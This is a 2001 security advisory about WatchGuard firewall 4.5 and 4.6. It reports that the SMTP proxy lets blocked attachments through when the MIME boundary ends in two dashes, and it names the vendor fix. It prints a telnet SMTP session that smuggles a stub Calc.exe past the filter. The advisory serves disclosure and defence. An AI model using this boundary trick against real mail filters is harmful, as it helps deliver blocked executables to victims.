COMMAND

    WatchGuard

SYSTEMS AFFECTED

    WatchGuard 4.5, 4.6

PROBLEM

    Thomas Boll found following.  Users have reported that attachments
    blocked by file extension make  it through the SMTP Proxy  even if
    the file extension is on the blocked list (WG 4.6).

    After  some  testing  we  believe   that  the  MIME  boundary   is
    responsible for the SMTP Proxy to fail. If the MIME boundary  ends
    in  two  dashes  the  Proxy   will  not  correctly  identify   the
    attachment.  This seems to  be typical for FreeBSD based  systems.
    This behaviour  can be  simply tested  on any  firewall using  the
    SMTP  Proxy  denying  some  attachments  based  on  the  filename.
    Consider the two examples at the end of this message.

    The reason seems to be obvious, two dashes end the MIME container,
    which leads to a misinterpretation of the SMTP proxy.

        # telnet smtpserv 25
        Trying xxx.xxx.xxx.xxx...
        Connected to xxx.xxx.xx.
        Escape character is '^]'.
        220 SMTP service ready
        helo mydomain.com
        250 Requested mail action okay, completed
        mail from: me@mydomain.com
        250 Requested mail action okay, completed
        rcpt to: me@smtpserv.mydomain.com
        250 Requested mail action okay, completed
        data
        354 Start mail input; end with <CRLF>.<CRLF>
        Content-Type: multipart/mixed; boundary="--sugus"

        ----sugus
        Content-Type: application/octet-stream; filename="Calc.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment; filename="Calc.exe"

        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAA
        .
        250 Requested mail action okay, completed

        =====> THE ANSWER IS CORECT AS IN:
        ---------------------------------------------------------------
        From me@mydomain.com  Mon May 28 00:46:37 2001
        Return-Path: <me@mydomain.com>
        Delivered-To: me@smptserv.mydomain.com
        Content-Type: multipart/mixed; boundary="--sugus"
        Date: Mon, 28 May 2001 00:45:54 +0200 (CEST)
        From: mw@mydomain.com

        ----sugus
        Content-Type: text/plain; charset=us-ascii

        [Attachment denied by WatchGuard SMTP proxy (type
        "application/octet-stream", filename "Calc.exe")]

    If however the boundary ends in --, the check will fail:

        .....
        Content-Type: multipart/mixed; boundary="--sugus--"

        ----sugus--
        Content-Type: application/octet-stream; filename="Calc.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment; filename="Calc.exe"

        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAA
        .
        250 Requested mail action okay, completed


        THE RESULT IS WRONG NOW:

        ----sugus--
        Content-Type: application/octet-stream; filename="Calc.exe"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment; filename="Calc.exe"

        TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAA
        ...

    Versions 4.5 and  4.6 have been  tested and confirmed  vulnerable.
    It is unknown if other versions are vulnerable also.

SOLUTION

    This bug has been fixed for the latest version of the code (4.61).
    All current LiveSecurity subscribers can go to

        http://www.watchguard.com/support

    to obtain the service pack that addresses this bug (4.61 SP1).